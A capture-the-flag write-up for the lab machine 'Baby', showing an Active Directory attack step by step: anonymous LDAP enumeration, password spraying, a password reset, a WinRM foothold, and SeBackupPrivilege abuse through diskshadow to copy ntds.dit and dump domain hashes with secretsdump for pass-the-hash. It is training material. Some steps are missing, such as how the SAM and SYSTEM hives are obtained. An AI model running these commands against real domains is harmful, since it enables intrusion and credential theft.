Skip to main content

Machine (Easy) - Baby

Writeup for the Baby machine, an easy-level Windows challenge focused on LDAP enumeration and privilege escalation.

Writeup Author: BobBuilder

Objective: Enumerate an exposed LDAP service to discover a default password, gain a foothold with a domain user, and escalate to Domain Admin by abusing backup privileges to extract Active Directory secrets.

Category Difficulty Platform Machine Author
Machine Easy Windows xct

User

LDAP Enumeration

We begin with anonymous LDAP enumeration:

ldapsearch -x -H ldap://<baby_ip> -D '' -w '' -b "DC=baby,DC=vl"

To extract user-related attributes:

ldapsearch -x -H ldap://<baby_ip> -b "DC=baby,DC=vl" distinguishedName sAMAccountName userPrincipalName cn description

This reveals a useful description:

description: Set initial password to <REDACTED>

Password Spraying

Using this default password, we test against valid usernames:

nxc ldap <baby_ip> -u baby_users.txt -p '<REDACTED>'

We find one account (Caroline.Robinson) returns:

STATUS_PASSWORD_MUST_CHANGE

Password Reset

Reset the password using SMB:

smbpasswd -r <baby_ip> -U 'baby.vl\Caroline.Robinson'
  • Provide old password (<REDACTED>)
  • Set new one (e.g., Password1!)

We now have a valid set of domain credentials.

evil-winrm -i <baby_ip> -u 'Caroline.Robinson' -H '<REDACTED>'

Root

Privilege Discovery

whoami /all
  • SeBackupPrivilege and SeRestorePrivilege are enabled.

These allow reading sensitive registry hives and accessing shadow copies.

Extracting Domain Hashes from NTDS

To get domain account hashes, we need ntds.dit from the exposed volume.

Create a backup.txt for diskshadow:

set verbose on
set metadata C:\Users\Public\Documents\dump.cab
set context persistent
set context clientaccessible
begin backup
add volume C: alias cdrive
create
expose %cdrive% Z:
end backup

Run the snapshot tool:

diskshadow /s backup.txt

Copy the NTDS database from the snapshot:

robocopy /b Z:\Windows\NTDS . ntds.dit

Download all three files:

  • ntds.dit
  • sam.save
  • system.save

Dumping Domain Credentials

impacket-secretsdump -ntds ntds.dit -system system.save -sam sam.save LOCAL

Administrator Access via WinRM

evil-winrm -i <baby_ip> -u administrator -H <REDACTED>
Back to top